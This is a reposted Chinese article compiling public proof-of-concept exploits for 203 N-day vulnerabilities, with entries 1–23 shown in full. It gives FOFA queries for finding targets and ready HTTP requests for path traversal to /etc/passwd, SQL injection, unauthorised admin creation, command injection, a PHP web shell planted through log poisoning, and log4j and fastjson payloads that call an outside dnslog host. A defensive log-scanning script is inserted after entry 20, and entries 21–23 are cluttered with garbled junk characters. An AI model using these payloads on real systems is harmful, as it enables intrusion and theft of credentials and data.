Internet Public Vulnerability Compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界 (author: 网络安全新视界).

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world and red/blue-team attacks; this article is meant to help the defensive side. Defenders can use its contents to check their own exposure.

Sources: The article covers 203 POCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.
Patches: All of the vulnerabilities are public. For patches or remediation guidance, contact the product vendor.
Content: Because of length limits, a few over-long POCs are abbreviated with the placeholder PAYLOAD; search for the complete POC yourself if you need it.

Legal: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the material will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to receive the full list" gate. This article is the complete, current list; when using it, press F12 and search for the keyword you need.

Bookmark this article if it is useful to you, and follow the public account (网络安全新视界).
Contents

01
1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运主动安全监控云平台 arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud 政府财务云 arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空社会化商业 ERP validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 permission bypass
66. 万户ezOFFICE SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普掌上校园服务管理平台 service.action remote command execution
77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
79. BYTEVALUE 百为流控路由器 remote command execution
80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御安全网关 aaa_local_web_preview file upload
88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
89. 致远互联FE协作办公平台 editflow_manager SQL injection
90. 海康威视 IP network intercom/broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
92. 海康威视运行管理中心 session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视高清智能录播系统 busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研工程质量检测系统 arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅通信指挥调度平台 down_file.php SQL injection
138. 福建科立讯通信指挥调度平台 pwd_update.php SQL injection
139. 福建科立讯通信指挥调度平台 editemedia.php SQL injection
140. 福建科立讯通信指挥调度平台 get_extension_yl.php SQL injection
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔消防救援作战调度平台 SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信票务管理平台 SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle tracking platform SQL injection
172. DT-高清车牌识别摄像机 arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. 电信网关配置管理系统 rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C校园网自助服务系统 flexfileupload arbitrary file upload
179. 建文工程管理系统 arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼应用虚拟化系统 SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会视频会议 attachment arbitrary file read
189. 蓝网科技临床浏览系统 deleteStudy SQL injection
190. 短视频矩阵营销系统 poihuoqu arbitrary file read
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
195. 飞鱼星上网行为管理系统 send_order.cgi command execution
196. 河南省风速科技统一认证平台 password reset
197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload file upload
200. SeaCMS海洋影视管理系统 dmku SQL injection
201. 方正全媒体新闻采编系统 binary SQL injection
202. 微擎系统 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC List

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want for the new account.

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运主动安全监控云平台 arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"

Log in to the admin backend with the default account admin, then send the request below (the stok token in the URL and the sysauth cookie both come from that login).

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the following statement, URL-encoded twice:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: fetch the login page to obtain the cookies.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is reused in the following requests.

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The traversal in the language parameter points at the application log directory, so the login value (a PHP stub that runs system() on the base64-decoded value of the K1SYJPMHLU4Z request header) is written into the log file that step 3 then includes.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: request the day's log file through the page viewer to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command.

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice医微云 SQL injection
FOFA: title="HFOffice"

The POC injects a HASHBYTES call that computes the MD5 of 1234; check the response for the resulting hash.

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

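Entries 2, 6, 7, 12, 13, 14, 15 and 20 above all reach a file or a protected handler through the shape of a path or a path-like parameter: dot-segments, absolute OS paths, a file: URL handed to a fetcher, or the ";.ico" matrix-parameter suffix that Spring's path matcher drops before matching security rules. The following is an added example for defenders, not code from the article or from any of the affected products: it canonicalises each request path and parameter and reports which of those shapes it carries, so access logs can be screened for the same probes. The SENSITIVE pattern list and the sample requests (rebuilt from the POCs above, with placeholder hosts) are assumptions to be tuned per application.

```python
"""Added example (not from the original article or the affected products):
flag request paths and parameters carrying the traversal / path-bypass shapes
used in entries 2, 6, 7, 12-15 and 20. Samples are constructed from those POCs."""
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Targets an application should never serve verbatim (assumption: tune per app).
SENSITIVE = re.compile(
    r"(^|[/\\])(etc|WEB-INF|windows)([/\\]|$)"  # /etc/passwd, /WEB-INF/..., /windows/
    r"|^[a-zA-Z]:[/\\]"                         # drive-letter absolute path (c:/...)
    r"|^file:",                                 # file: URL handed to a fetcher
    re.I,
)


def decode_fully(value: str) -> str:
    """Percent-decode until stable (bounded), so %252e%252e is not missed."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def path_findings(raw_path: str) -> list[str]:
    """Reasons the URL path itself looks like a traversal or route bypass."""
    findings = []
    decoded = decode_fully(raw_path)
    # ";.ico" is a matrix parameter: Spring strips it before matching, so
    # /user/getAllList;.ico reaches the handler while a permit-all rule for
    # *.ico lets it through (entry 14).
    if ";" in decoded:
        findings.append("matrix-parameter suffix")
    stripped = decoded.split(";")[0]
    segments = stripped.split("/")
    if ".." in segments or "." in segments[1:]:
        findings.append("dot-segment in path")
    canonical = posixpath.normpath(stripped)
    if SENSITIVE.search(canonical):
        findings.append(f"sensitive target {canonical}")
    return findings


def value_findings(name: str, value: str) -> list[str]:
    """Same checks for one query/body parameter (entries 6, 7, 12, 13, 20)."""
    findings = []
    decoded = decode_fully(value).replace("\\", "/")
    if ".." in decoded.split("/") or "/./" in decoded:
        findings.append(f"dot-segment in {name}")
    if SENSITIVE.search(posixpath.normpath(decoded)):
        findings.append(f"sensitive target in {name}")
    return findings


def inspect_request(target: str, body: str = "") -> list[str]:
    """Inspect a request-target plus optional urlencoded body; [] means clean."""
    parts = urlsplit(target)
    findings = path_findings(parts.path)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if body:
        params += parse_qsl(body, keep_blank_values=True)
    for name, value in params:
        findings += value_findings(name, value)
    return findings


# Constructed samples: request-target and body as printed in the POCs above.
SAMPLES = {
    "casdoor": ("/static/../../../../../../../../../../../etc/passwd", ""),
    "ngaf": ("/svpn_html/loadfile.php?file=/etc/./passwd", ""),
    "808gps": ("/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties", ""),
    "jorani": ("/session/login", "language=..%2F..%2Fapplication%2Flogs&login=x"),
    "ioffice": ("/ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini", ""),
    "jsherp_matrix": ("/jshERP-boot/user/getAllList;.ico", ""),
    "jsherp_dotdot": ("/jshERP-boot/user/a.ico/../getAllList", ""),
    "dahua_icc": ("/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd", ""),
    "easycvr_userlist": ("/api/v1/userlist?pageindex=0&pagesize=10", ""),
}


def scan_samples() -> dict[str, list[str]]:
    return {name: inspect_request(t, b) for name, (t, b) in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:18} {'; '.join(hits) or 'no traversal signature'}")
```

Entry 3's /api/v1/userlist deliberately produces no finding: a missing authorization check leaves no syntactic trace in the request, so endpoints of that kind have to be baselined by URL and expected caller rather than matched by pattern.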
& ~2 s+ Y: c- f# u5 N% J. n# i
21. 大华ICC智能物联综合管理平台random远程代码执行
8 E- J3 Q" H: KFOFA:icon_hash="-1935899595"8 e7 t8 o7 n0 P) D) m
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1, X- ]" p2 `" @
Host: x.x.x.x0 o# j( k7 h4 L; X! h) [4 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 T& a! J% s. J- fContent-Length: 161- T( C6 ]5 K$ N
Accept-Encoding: gzip
! I- x0 p: d/ VConnection: close5 v8 ?& W" h$ `+ o
Content-Type: application/json;charset=utf-8
! g. F0 O# U) [9 x. t9 M, j" \) F" H, b: Y
{
6 @5 x: g; d( V: r9 g! ~, r! ["a":{* d0 j# O5 T+ w
"@type":"com.alibaba.fastjson.JSONObject",- d: Z& b* N) `- P: r' V6 v1 ?8 E. E; z
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}3 a: t# m; o _
}""
* e; J/ t4 J! i$ u. b}
3 [% k2 g( R* [ X9 f# H5 w% p: W: c* j* E- P$ Y& g
1 ~9 G/ o" ~) t" n/ i22. 大华ICC智能物联综合管理平台 log4j远程代码执行( D2 ^5 Z; @9 V5 J8 Y u$ Z
FOFA:icon_hash="-1935899595"6 _; o5 }$ [7 j0 M8 L
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
* ~$ }$ g9 d* t+ j) d* e+ PHost: your-ip' f* k/ @1 |3 l; f. l T5 y& K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; d* B4 z# p# t
Content-Type: application/json;charset=utf-8
. f2 K8 q7 x- w) x/ f% q0 u
- H: A- t7 E; I U4 H9 [{: k3 v' w, A) s
"loginName":"${jndi:ldap://dnslog}"
1 Z ~3 ?5 f5 _8 u S; o) v8 b}- x. d! ~9 ?6 I' s9 O2 Q
% d% T' v" q( |- d/ K: y: r4 t" F L+ G% ?4 c1 C$ s% ?& z
/ ?# o+ x& m" m3 g/ P2 Q6 n
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
b8 ~0 z0 B4 bFOFA:icon_hash="-1935899595"
1 V X6 Z' p' D _5 TPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
5 {0 s- P6 t0 p* Y# m; Q! KHost: your-ip- w x4 e8 z' I+ y8 @6 x9 m, @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. K9 [# U7 g3 X
Content-Type: application/json;charset=utf-8
5 t+ h" d7 _. s- j) aAccept-Encoding: gzip
2 m4 Y0 m$ U. N. {! T4 b7 fConnection: close
# R. L8 o* Z+ M9 b- j; K) L2 t8 w- s5 {, a6 i! I0 S
{/ h4 \( |$ U& O/ P
"a":{3 j4 \6 S) u! k% z' Q
"@type":"com.alibaba.fastjson.JSONObject",
/ q1 m K, @+ F- K {"@type":"java.net.URL","val":"http://DNSLOG"}. ^3 n/ s0 c5 K1 r0 T. c
}"". V& h/ o3 A4 R% |9 t. R
}6 |6 `( f2 H0 I2 `6 g* a- z
